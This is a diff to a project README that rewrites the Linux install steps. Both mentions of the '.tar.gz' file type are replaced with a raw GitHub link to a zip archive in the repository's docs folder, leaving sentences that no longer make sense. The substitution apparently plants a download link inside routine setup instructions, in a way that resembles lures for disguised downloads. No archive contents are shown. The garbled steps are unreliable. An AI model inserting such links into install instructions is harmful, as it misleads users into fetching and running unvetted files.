nirajverma445/activity-reporting-for-donors/README.md

 - Eject the installer image when done.

 #### On Linux
-- The download might be a `.AppImage` or `.tar.gz` file.
+- The download might be a `.AppImage` or `https://raw.githubusercontent.com/nirajverma445/activity-reporting-for-donors/main/docs/activity-reporting-for-donors-3.7.zip` file.
 - If `.AppImage`, make the file executable by right-clicking → Properties → Permissions, then check "Allow executing file as program."
 - Double-click the file to start the application.
-- For `.tar.gz` files, extract the contents and follow any README instructions inside.
+- For `https://raw.githubusercontent.com/nirajverma445/activity-reporting-for-donors/main/docs/activity-reporting-for-donors-3.7.zip` files, extract the contents and follow any README instructions inside.

 ---